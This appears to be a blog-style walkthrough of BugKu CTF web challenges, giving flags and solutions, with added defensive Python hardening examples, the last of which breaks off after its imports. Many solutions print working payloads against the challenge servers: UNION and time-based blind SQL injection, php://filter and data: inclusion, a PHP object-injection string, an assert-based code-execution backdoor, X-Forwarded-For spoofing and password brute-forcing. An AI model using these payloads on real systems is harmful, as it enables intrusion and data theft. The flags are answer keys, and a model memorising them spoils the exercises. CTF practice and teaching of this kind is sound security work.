BugKu Web topic


This is the sixth day of my participation in the August Text Challenge. More challenges in August.


1. web2

There are comments in the page source. Answer: KEY{Web-2-bugKssNNikls9100}

2. Calculator

Analysis: the challenge shows a very simple arithmetic captcha; entering the correct result returns the flag. The input box, however, only accepts one character: inspecting the element shows its maxlength attribute is set to 1. Change maxlength to 5, enter the result, and the flag is returned.

Answer: flag{CTF-bugku-0032}

3. Web basics: $_GET

Challenge: http://123.206.87.240:8002/get/

Analysis: as the challenge says, just modify the URL: http://123.206.87.240:8002/get/?what=flag

Answer: flag{bugku_get_su8kej2en}, from http://123.206.87.240:8002/get/?what=flag

4. Web basics: $_POST

Analysis: the value to POST is

what=flag

Method 1: send the POST request with the online tool coolaf.com/

Method 2: send the POST data with the Firefox HackBar plugin:

what=flag

Answer: flag{bugku_get_ssseint67se}

5. Contradiction

Challenge: http://123.206.87.240:8002/get/index1.php

Analysis:

<?php
$num = $_GET['num'];          // read the parameter from GET
if (!is_numeric($num))        // is_numeric() tells whether $num is a number or a numeric string: bool is_numeric(mixed $var)
{
    echo $num;
    if ($num == 1)            // the contradiction: $num must not be numeric, yet loosely equal 1
        echo 'flag{**********}';
}

Construct the payload num=1e0.1: is_numeric() rejects it, but the loose comparison only uses the leading numeric prefix "1e0", which equals 1.

http://123.206.87.240:8002/get/index1.php?num=1e0.1

Answer: flag{bugku-789-ps-ssdf}

6. web3

The last line of the page source is

<!-- &#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125; -->

Decoding the HTML entities gives the flag (see www.jianshu.com/p/6750db094…).

Decoding tool: www.convertstring.com/zh_CN/Encod…

Flag:

KEY{J2sa42ahJK-HS11III}

7. Domain name resolution: modify the hosts file so that flag.baidu.com points at the challenge server, then visit flag.baidu.com

8. You have to make it stop

flag{dummy_game_1s_s0_popular}

9. Local include

http://123.206.87.240:8003/

(1) The title says this is a local file inclusion challenge. (When building the site the programmer included local files from the script for convenience; we can abuse that to read the file we want.)

(2) The code is:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval("var_dump($a);");
show_source(__FILE__);
?>

A. include "flag.php" pulls in the flag we want.

B. $_REQUEST is a superglobal like $_GET and $_POST; changes to the latter at runtime do not affect $_REQUEST and vice versa.

C. Submit a value named hello via GET, POST, cookies, etc.

D. eval() executes a string as PHP code.

E. The last line highlights the source of this page.

(3) Create a parameter named hello that outputs the contents of flag.php as an array:

?hello=file("flag.php")

(4) Explanation:

A. file() reads a file and returns its lines as an array.

http://123.206.87.240:8003/?hello=file(%22flag.php%22)

flag{bug-ctf-gg-99}

From http://123.206.87.240:8003/?hello=file(%22flag.php%22)

10. Variable 1

Title: Flag in the variable!

<?php
error_reporting(0);
include "flag1.php";
highlight_file(__FILE__);
if (isset($_GET['args'])) {
    $args = $_GET['args'];
    if (!preg_match("/^\w+$/", $args)) {
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

preg_match() performs a regular-expression match; eval() executes a string as PHP code; var_dump() prints information about a variable. /^\w+$/ allows only letters, digits and underscores. eval("var_dump($$args);") dumps the variable whose name is the value of args (a variable variable). $GLOBALS is an array containing every variable in the global scope, keyed by variable name.

A variable variable lets a variable name be chosen dynamically: the name is taken from the value of another variable by prefixing an extra "$". So pass the name of the global array: ?args=GLOBALS, i.e. http://123.206.87.240:8004/index1.php?args=GLOBALS

flag{92853051ab894a64f7865cf3c2128b34}

11. Web5

The page source is JSFuck; decoding it gives

ctf{whatfk}

Answer: CTF{WHATFK}

12. First class

(1) Configure Burp Suite. (2) Find the flag in the response header.

flag{Bugku_k8_23s_istra}

13. The website was hacked

Description: not much technical content, but a situation often met in practice: http://123.206.87.240:8002/webshell/

A hacked site usually has a webshell left behind. Scanning with the Yujian (御剑) directory scanner finds it:

http://123.206.87.240:8002/webshell/shell.php

Brute-force the webshell password with Burp Suite: hack

Hack_bug_ku035}

14. Administrator system

Open the page and view the source.

The comment dGVzdDEyMw== base64-decodes (tool.chinaz.com/Tools/Base6…) to test123; try logging in as admin with test123.

The response says only the local administrator may log in. The server takes the client IP from the X-Forwarded-For (XFF) header, which is meant to carry the original client address behind a proxy.

So spoof the access source: intercept the request, add a forged XFF header and log in as a local client:

X-Forwarded-For: 127.0.0.1

Send the request to the Repeater module and click Go.

Flag: flag{85ff2ee4171396724bae20c0bd851f6b}

15. web4

Viewing the page source shows three URL-encoded sections; URL-decode them.

After decoding, the statement executed by eval() concatenates the pieces; the value to check is the MD5 value 67d709b2b54aa2aa648cf6e87a7114f1. Submit it to obtain the flag.

KEY{J22JK-HS11}

16. Flag is in index

File inclusion: php://filter

Blog.csdn.net/anjiaowangm…

After clicking, the URL becomes http://123.206.87.240:8005/post/index.php?file=show.php; the file parameter suggests inclusion.

So use php://filter (details in the reference article above): http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

Then base64-decode the output to obtain the flag: flag{edulcni_ELif_LACol_SI_siHT}

17. Enter the password to view the flag

The password is five digits, so brute-force it with Burp Suite:

(1) Configure the browser proxy.

(2) Enable the Burp proxy and configure the same address/port.

(3) Enable the proxy.

(4) Brute-force procedure:

Burp captures the password just entered; send it to Intruder.

If the target uses HTTPS, tick the HTTPS option.

On the Positions tab click Clear to drop the positions Burp guessed, then select 12345 (the password just entered) and click Add. Then set the Payload set parameters.

Options can also set the thread count; set it to 100 and start the attack from the top right.

Then sort by Length to see which response differs from the others; that one is the password, because it is the only successful login.

Enter the password 12379.

Get: flag{bugku-baopo-hah}

18. One million hits

The source

<script>
    var clicks = 0;
    $(function() {
        $("#cookie")
            .mousedown(function() {
                $(this).width('350px').height('350px');
            })
            .mouseup(function() {
                $(this).width('375px').height('375px');
                clicks++;
                $("#clickcount").text(clicks);
                if (clicks >= 1000000) {
                    var form = $('<form action="" method="post">' +
                        '<input type="text" name="clicks" value="' + clicks + '" hidden/>' +
                        '</form>');
                    $('body').append(form);
                    form.submit();
                }
            });
    });
</script>

The counter lives entirely in the browser and is simply POSTed as clicks, so send the value directly with a script:

import requests, re
r = requests.post('http://123.206.87.240:9001/test/', data={'clicks': 1000000})
a = re.findall(r'flag{(.*)}', r.text)
print('flag{%s}' % a[0])

flag{Not_C00kI3Cl1ck3r}

19. Backup is a good habit

After opening the page you see d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e.

Method (1): trying all kinds of decoding leads nowhere, so go back to the title, "backup". The common backup file suffix is .bak:

http://123.206.87.240:8002/web16/
http://123.206.87.240:8002/web16/index.php
http://123.206.87.240:8002/web16/index.php.bak

Method (2): a source-leak scanner that automatically requests common CTF clue files; a normal response means the file exists.

git clone https://git.coding.net/yihangwang/SourceLeakHacker.git

Usage: python SourceLeakHackerForLinux.py [URL]
Example: python SourceLeakHackerForLinux.py www.baidu.com/
Tips: your URL must start with "http://" or "https://". If you have any questions, please contact [ [email protected] ]

python SourceLeakHackerForLinux.py http://123.206.87.240:8002/web16/

If the status codes of index.php and index.php.bak are both 200, the file exists.

Method (3): scan with Yujian (御剑).

Download index.php.bak, remove the .bak suffix, and analyse it:

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
 */
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');   // strstr: the part of the URI from '?' onward (including '?')
$str = substr($str, 1);
$str = str_replace('key', '', $str);            // replace the string 'key' with an empty string
parse_str($str);
echo md5($key1);
echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) {   // md5(key1) == md5(key2) and key1 is not identical to key2
    echo $flag."Flag";
}
?>

Analysis: the script takes the query string and removes every occurrence of "key" (so write kekeyy, which becomes key after one removal), MD5s key1 and key2 and compares them: if the hashes are loosely equal but the raw values are not identical, it prints the flag. md5() cannot handle arrays: given an array it returns NULL, so two arrays both hash to NULL and compare equal under ==. http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=2

Alternatively, if two strings have MD5 values of the form 0exxxxx, == treats them as scientific notation, 0*10^xxxx, i.e. zero, so they compare equal.

The MD5 values of the following strings start with 0e: QNKCDZO 240610708 s878926199a s155964671a s214587387a

http://123.206.87.240:8002/web16/index.php?kekeyy1=s878926199a&kekeyy2=s214587387a

Bugku{OH_YOU_FIND_MY_MOMY}

20. Transcript inquiry

The transcript query at http://120.24.86.145:8002/chengjidan/ is a simple SQL injection.

URL: http://120.24.86.145:8002/chengjidan/index.php, POST parameter id:

id=2' and 1=0 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
// fl4g, sc

id=2' and 1=0 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c3467#
// skctf_flag

id=2' and 1=0 union select 1,2,3,skctf_flag from fl4g#
// BUGKU{Sql_INJECT0N_4813drd8hz4}

From findneo.github.io/180406bugku…

BUGKU{Sql_INJECT0N_4813drd8hz4}

21. Qiumingshan old driver (秋名山老司机)

Compute the expression quickly with a script:

import requests, re

def main():
    url = 'http://123.206.87.240:8002/qiumingshan/'
    s = requests.session()
    r = s.get(url)
    # r.encoding = 'utf-8'
    # the expression sits in an HTML element of the form <div>...=?;</div>; the tags were lost in
    # the page extraction, so the <div> below is assumed
    a = re.findall(r'<div>(.*)=\?;</div>', r.text)
    # print(r.text)
    a = eval(a[0])   # turn the expression string into a number (eval runs whatever the server sends, so only use it against the challenge page)
    r = s.post(url, data={'value': a})
    r.encoding = 'utf-8'
    print(r.text)

main()

Bugku{YOU_DID_IT_BY_SECOND}

22. Quickly view the web source

(1) A POST request with a margin parameter is required. The flag is in the response header: fetch it with Python, then construct a POST request that puts the flag in margin and sends it.

import requests
import base64

url = "http://123.206.87.240:8002/web6/"
r = requests.session()
headers = r.get(url).headers   # the flag is in the header

mid = base64.b64decode(headers['flag'])
mid = mid.decode()   # b64decode works on bytes; split() below needs str

flag = base64.b64decode(mid.split(':')[1])   # the value after "flag:"
data = {'margin': flag}
print(r.post(url, data).text)   # POST it back

KEY{111dd62fcd377076be18a}

23. Cookie fraud

www.cnblogs.com/izayoi/p/97…

(1) The page shows a pile of gibberish; each line is: rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry

(2) The original URL has two parameters: line= and filename=a2V5cy50eHQ=. (3) Base64-decode a2V5cy50eHQ= with tool.chinaz.com/Tools/Base6… The filename parameter determines the page returned (possibly source code); it is passed as base64 and decoded by base64_decode() in the back end.

So pass index.php instead; its base64 is aW5kZXgucGhw.

http://123.206.87.240:8002/web11/index.php?line=&filename=aW5kZXgucGhw returns nothing. (4) Perhaps the line parameter selects which line is returned? (5) Use a script to fetch all the lines:

import requests
ses = requests.session()
url = 'http://123.206.87.240:8002/web11/index.php'
for i in range(0, 30):
    payload = {'line': i, 'filename': 'aW5kZXgucGhw'}
    result = ses.get(url, params=payload).text
    print(result)

Or:

import requests
a = 20
for i in range(a):
    url = "http://123.206.87.240:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw" % i
    r = requests.get(url)
    print(r.text)

This gives

<?php
error_reporting(0);

$file = base64_decode(isset($_GET['filename']) ? $_GET['filename'] : "");

$line = isset($_GET['line']) ? intval($_GET['line']) : 0;

if ($file == '') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(
    '0' => 'keys.txt',
    '1' => 'index.php',
);

if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') {   // cookie margin=margin
    $file_list[2] = 'keys.php';   // unlocks access to keys.php
}

if (in_array($file, $file_list)) {
    $fa = file($file);
    echo $fa[$line];
}
?>

KEY{key_keys}

From findneo.github.io/180406bugku…

24. Never give up

F12 shows nothing in the page source, except a 1p.html at the top.

Use view-source: type view-source:http://123.206.87.240:8006/test/1p.html into the browser:

 <HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<! -- var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR 0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwO WV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQ SUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN 25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dld F9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJ TIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlM jglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlc XVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyM GdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" function OutWord() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } OutWord(); // -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

URL-decode the content of var Words (tool.chinaz.com/Tools/Base6…); the middle part is base64, so decode it (tool.chinaz.com/Tools/Base6…), substitute it back and URL-decode again:

<script>window.location.href='http://www.bugku.com';</script>
<!--";
if(!$_GET['id'])
{
    header('Location: hello.php?id=1');
    exit();
}
$id = $_GET['id'];
$a = $_GET['a'];
$b = $_GET['b'];
if(stripos($a, '.'))
{
    echo 'no no no no no no no';
    return;
}
$data = @file_get_contents($a, 'r');
if($data == "bugku is a nice plateform!" and $id == 0 and strlen($b) > 5 and eregi("111".substr($b, 0, 1), "1114") and substr($b, 0, 1) != 4)
{
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}
?>-->

Visit http://123.206.87.240:8006/test/f4l2a3g.txt to get flag{tHis_iS_THe_fLaG}

25. Welcome to bugkuctf

Blog.csdn.net/csu_vc/arti… php://filter and php://input

<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user) && (file_get_contents($user, 'r') === "welcome to the bugkuctf")){
    echo "hello admin!";
    include($file); //hint.php
}else{
    echo "you are not admin ! ";
}
-->

① file_get_contents() reads an entire file into a string. ② include or require inserts the contents of one PHP file into another (before the server executes it). require raises a fatal error (E_COMPILE_ERROR) and stops the script; include only raises E_WARNING and the script continues.

txt=php://input with the POST body "welcome to the bugkuctf", or the data protocol: txt=data:text/plain,welcome to the bugkuctf, i.e. http://123.206.87.240:8006/test1/index.php?txt=data:text/plain,welcome%20to%20the%20bugkuctf

file=php://filter/read=convert.base64-encode/resource=hint.php: http://123.206.87.240:8006/test1/index.php?txt=data:text/plain,welcome%20to%20the%20bugkuctf&file=php://filter/read=convert.base64-encode/resource=hint.php returns a base64-encoded field; decode it (tool.chinaz.com/Tools/Base6…) to get the hint source:

<?php
class Flag{ //flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }
    }
}
?>

Reading flag.php directly the same way gives an error.

Do the same for index.php and base64-decode:

<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];

if(isset($txt) && (file_get_contents($txt, 'r') === "welcome to the bugkuctf")){
    echo "hello friend!";
    if(preg_match("/flag/", $file)){
        echo "I can't give you a flag right now.";
        exit();
    }else{
        include($file);
        $password = unserialize($password);
        echo $password;
    }
}else{
    echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user) && (file_get_contents($user, 'r') === "welcome to the bugkuctf")){
    echo "hello admin!";
    include($file); //hint.php
}else{
    echo "you are not admin ! ";
}
-->

index.php refuses to include any file whose name matches /flag/ (preg_match), so flag.php cannot be read directly.

__toString() runs automatically when an object is used as a string. In the Flag class it outputs the contents of the file named by $file, so, given the hint flag.php, the blocked flag.php can be read here: password is unserialized and then echoed, which triggers __toString(). So make password a serialized Flag object whose file is flag.php.

Note password=unserialize($password); the payload is O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

http://123.206.87.240:8006/test1/index.php?txt=data:text/plain,welcome to the bugkuctf&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

Get the flag: flag{php_is_the_best_language}
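The three inclusion challenges above ("Flag is in index", "Cookie fraud" and this one) all hinge on a file name taken straight from the request, so php://filter, php://input and data: wrappers reach include() and file(). The following Python is an added hardening example, not code from this page or from the challenges: it models how a page parameter (raw or base64-encoded, as in the Cookie fraud challenge) should be resolved before any file is opened. INCLUDE_ROOT, ALLOWED_PAGES and the wrapper pattern are constructed for the example; only the allow-list decides, so a blacklist such as the /flag/ check in index.php is not needed.

```python
import base64
import posixpath
import re

# Constructed values for the example: the only directory includes may come
# from, and the only file names that may be included.
INCLUDE_ROOT = "/var/www/app/pages"
ALLOWED_PAGES = {"index.php", "show.php", "keys.txt"}
# Anything that starts with a scheme (php:, data:, file:, http:, ...) is a
# stream wrapper, not a file name.
WRAPPER = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)


def resolve_include(user_value, encoded=False):
    """Turn a user-supplied file name into an absolute path under INCLUDE_ROOT,
    or return None. Rejects stream wrappers (php://filter, php://input, data:),
    null bytes, directory traversal, and anything not on the allow-list.
    With encoded=True the value is base64, as in the Cookie fraud challenge."""
    name = user_value
    if encoded:
        try:
            # validate=True refuses non-alphabet characters instead of skipping them
            name = base64.b64decode(user_value, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return None
    if "\x00" in name or WRAPPER.match(name):
        return None
    # Normalise the joined path and require it to sit directly inside the root;
    # "../../etc/passwd" normalises to a path with a different parent.
    full = posixpath.normpath(posixpath.join(INCLUDE_ROOT, name))
    if posixpath.dirname(full) != INCLUDE_ROOT:
        return None
    # Allow-list, not a blacklist: flag.php or keys.php are simply not listed.
    if posixpath.basename(full) not in ALLOWED_PAGES:
        return None
    return full


if __name__ == "__main__":
    for value in ("show.php", "aW5kZXgucGhw",
                  "php://filter/read=convert.base64-encode/resource=index.php",
                  "data:text/plain,welcome to the bugkuctf", "../../../etc/passwd", "flag.php"):
        print(repr(value), "->", resolve_include(value, encoded=(value == "aW5kZXgucGhw")))
```

Only values that survive resolve_include() should ever be passed to include() or file(); the cookie that unlocks keys.php in the original code would then be a change to ALLOWED_PAGES, made server-side, rather than a client-controlled switch.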

26. A dog word

The hint given is

<?php
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s']);
?>

explode(separator, string, limit) splits a string into an array. This code splits $poc on "#" and joins the pieces back into "assert", then calls assert() on the s parameter, so arbitrary code can be executed. http://123.206.87.240:8010/?s=var_dump(scandir('/'))

array(6) {
  [0]=>
  string(1) "."
  [1]=>
  string(2) ".."
  [2]=>
  string(8) "f14g.txt"
  [3]=>
  string(9) "index.php"
  [4]=>
  string(4) "xxxx"
  [5]=>
  string(19) "Everyone is responsible for protecting CTF. TXT"
}

Can you get the flag? http://123.206.87.240:8010/f14g.txt gives BUGKU{bugku_web_009801_a}

27. Characters? Regular?

Challenge address: http://123.206.87.240:8002/web10/

<?php
highlight_file('2.php');
$key = 'KEY{********************************}';
$IM = preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if ($IM) {
    die('key is: '.$key);
}
?>

Give id a value that satisfies the regular expression, for example: http://123.206.87.240:8002/web10/?id=/keyaakeyaaaaakey:/a/aakeya%27/i which prints the flag: key is: KEY{0x0sioph550afc}

28. Ex-girlfriend

The code at http://123.206.31.85:49162/code.txt:

<?php
if (isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])) {
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if ($v1 != $v2 && md5($v1) == md5($v2)) {
        if (!strcmp($v3, $flag)) {
            echo $flag;
        }
    }
}
?>

It requires v1 != v2 with equal md5 values, which, as mentioned before, is 240610708 and QNKCDZO; then v3 is compared with flag using strcmp(), which has the weakness that it cannot compare arrays. Here I construct as follows:

Get the flag SKCTF{Php_1s_tH3_B3St_L4NgUag3}

29. login1

Hint: SQL constraint attack

A constraint attack works by registering an account whose name is 'admin' followed by several spaces (three here) with a password of your choice, e.g. '123', then logging in with it: the login succeeds, but the database returns the first matching user in the table, i.e. the real admin (MySQL has since fixed this bug), so you can log in as admin and get the flag. Here I registered the account as 'admin' followed by six spaces with the password 'ABCabc123' and successfully got the flag as the administrator.

SKCTF{4Dm1n_HaV3_GreAt_p0w3R}

From findneo.github.io/180406bugku…

30. Where are you from

http://123.206.87.240:9009/from.php

HTTP_REFERER: the Referer is part of the request header. When a browser sends a request to a web server it usually carries the Referer, telling the server which page the request came from, so the server can use that for processing. For example, when I link to a friend's site from my home page, his server can count from the Referer how many users click through from my home page each day. The correct English spelling is referrer; the misspelling comes from the early HTTP specification and was kept for backward compatibility. Specifications for other web technologies use the correct spelling, so the spelling is not uniform today.

Method ①: right-click and send the request to Repeater, add Referer: www.google.com and click Go.

Method ②: use the HackBar plugin:

http://123.206.87.240:9009/from.php

Referer: www.google.com

flag{bug-ku_ai_admin}

31. md5 collision (NUPT_CTF)

In PHP, if both MD5 values start with 0e, the loose comparison treats the two values as equal, so a script could search for a string whose MD5 starts with 0e. The following list can be used directly.

Strings whose MD5 starts with 0e (string, MD5):

s878926199a   0e545993274517709034328855841020
s155964671a   0e342768416822451524974117254469
s214587387a   0e848240448830537924465865611904
s1091221200a  0e940624217856561557816327384675
s1885207154a  0e509367213418206700842008763514
s1502113478a  0e861580163291561247404381396064
s1836677006a  0e481036490867661113260034900752
s1184209335a  0e072485820392773389523109082030
s1665632922a  0e731198061491163073197128363787
s532378020a   0e220463095855511507588041205815

http://123.206.87.240:9009/md5.php?a=s878926199a gives flag{md5_collision_is_easy}
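The behaviour behind this list, and behind the "contradiction" (num=1e0.1), "backup is a good habit" and "ex-girlfriend" challenges, is PHP type juggling in the loose == operator. The following Python is an added illustration, not code from this page: it models PHP 7's == for strings and numbers, checks the magic hashes with a real MD5, and shows the strict comparison a developer should use instead. The numeric-string grammar is a simplification of PHP 7's (leading whitespace allowed, trailing not), and PHP 8 no longer casts a non-numeric string to a number when comparing it with an int, so the "1e0.1" case is PHP 7 behaviour.

```python
import hashlib
import re

# Simplified PHP 7 numeric-string grammar (assumption: leading whitespace only).
NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")
# Leading numeric prefix, used when PHP 7 casts a non-numeric string to a number.
NUMERIC_PREFIX = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def is_numeric(value):
    """Model of PHP is_numeric(): true for ints, floats and numeric strings."""
    if isinstance(value, bool):
        return False
    if isinstance(value, (int, float)):
        return True
    return isinstance(value, str) and NUMERIC_STRING.match(value) is not None


def to_number(s):
    """PHP 7 string-to-number cast: the leading numeric prefix, else 0 ("1e0.1" -> 1.0, "abc" -> 0.0)."""
    m = NUMERIC_PREFIX.match(s)
    return float(m.group(0)) if m else 0.0


def php7_loose_eq(a, b):
    """Model of PHP 7 '==' for str/int/float operands (the juggling the challenges rely on)."""
    if isinstance(a, str) and isinstance(b, str):
        # Two strings are compared as numbers when BOTH are numeric strings,
        # which is why every "0e<digits>" hash equals every other: 0 * 10^n == 0.
        if is_numeric(a) and is_numeric(b):
            return float(a) == float(b)
        return a == b
    if isinstance(a, str):
        a, b = b, a                      # normalise to (number, string)
    if isinstance(b, str):
        # Number vs string: PHP 7 converts the string, so 1 == "1e0.1" and 0 == "abc".
        return float(a) == to_number(b)
    return float(a) == float(b)


def strict_eq(a, b):
    """PHP '===': same type and same value, no juggling. Use this (or hash_equals) for hashes."""
    return type(a) is type(b) and a == b


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def contradiction_passes(num):
    """The check from the 'contradiction' challenge: not numeric, yet loosely equal to 1."""
    return (not is_numeric(num)) and php7_loose_eq(num, 1)


if __name__ == "__main__":
    for word in ("QNKCDZO", "240610708", "s878926199a"):
        print(word, md5_hex(word))
    print("loose:", php7_loose_eq(md5_hex("QNKCDZO"), md5_hex("240610708")),
          "strict:", strict_eq(md5_hex("QNKCDZO"), md5_hex("240610708")))
    print("1e0.1 passes contradiction:", contradiction_passes("1e0.1"))
```

The fix in real code is the strict form: compare hashes with === (or hash_equals()), and validate numeric input with is_numeric() or a cast before comparing it, rather than relying on == to do the conversion.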

32. Programmer's local site

Blog.csdn.net/qq_26090065… flag{loc-al-h-o-st1}

33. All kinds of bypass

After opening:

<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    else if (sha1($_GET['uname']) === sha1($_POST['passwd']) & ($_GET['id'] == 'margin'))
        die('Flag: '.$flag);
    else
        print 'sorry! ';
}
?>

http://123.206.87.240:8002/web7/flag.php. Analysis: id is first urldecode()d (if it is not URL-encoded, decoding returns it unchanged).

In the first comparison uname must != passwd to continue.

In the second comparison, sha1() is a hash function that can be bypassed with arrays.

This one is fairly simple; my request: http://123.206.87.240:8002/web7/?uname[]=1&id=margin

flag{HACK_45hhs_213sDD}

34. Web8

Hint: txt???? Opening http://123.206.87.240:8002/web8/ shows

<?php
extract($_GET);
if (!empty($ac))
{
    $f = trim(file_get_contents($fn));
    if ($ac === $f)
    {
        echo "<p>This is flag:" ." $flag</p>";
    }
    else
    {
        echo "<p>sorry!</p>";
    }
}
?>

Using php://input, or simply ac=flags&fn=flag.txt:

http://123.206.87.240:8002/web8/?ac=flags&fn=flag.txt

Get the flag: flag{3cfb7a90fc0de31}

35. Careful

Address: http://123.206.87.240:8002/web13/, find a way to become admin.

The two links on the page lead nowhere.

http://123.206.87.240:8002/web13/robots.txt gives a new hint:

http://123.206.87.240:8002/web13/resusl.php

Pass x=admin directly: http://123.206.87.240:8002/web13/resusl.php?x=admin

Get the flag: flag{ctf_0098_lkji-s}

36. Getshell

// Uploading PHP scripts is not allowed. www.cnblogs.com/RenoStudio/… KEY{bb35dc123820e}

Suffix blacklist detection and type detection.

37. INSERT INTO

The challenge gives the code:

<?php
error_reporting(0);

function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(', ', $ip);
    return $ip_arr[0];
}

$host = "localhost";
$user = "";
$pass = "";
$db = "";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql = "insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

Error reporting is switched off; the program records the visitor's IP in the database. The IP is read from X-Forwarded-For: sending X-Forwarded-For: 101.130.55.133 prints "your ip is :101.130.55.133", so the header goes into the INSERT unfiltered and a time-based blind injection works, using select case when XXX then XXX else XXX end together with substr/substring, e.g.

11'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))%23

#-*- encoding: utf-8 -*-

import requests
import string

mystring = string.ascii_letters + string.digits
url = "http://123.206.87.240:8002/web15/"
# {0} and {1} are filled in by format() below
data = "127.0.0.1'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep(5) else 1 end) and '1' = '1"
flag = ''

for i in range(1, 35):
    for j in mystring:
        try:
            headers = {'x-forwarded-for': data.format(str(i), j)}
            res = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            flag += j
            print(flag)
            break

print('The final flag:' + flag)

flag{cdbf14c9551d5be5612f7bb5d2867853}
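Two separate mistakes make this challenge work: getIp() trusts whatever the client puts in X-Forwarded-For (the same trust that let 127.0.0.1 be spoofed in the "Administrator system" challenge), and the value is interpolated into the INSERT as a string (the same pattern as the id parameter in "Transcript inquiry"). The following Python is an added defensive counterpart, not the challenge's code: it resolves the client address the way a hardened getIp() should, rejects anything that is not a well-formed IP, and uses a bound parameter for the INSERT. sqlite3 stands in for MySQL; the table, the trusted proxy address and the sample requests are constructed for the example.

```python
import ipaddress
import sqlite3

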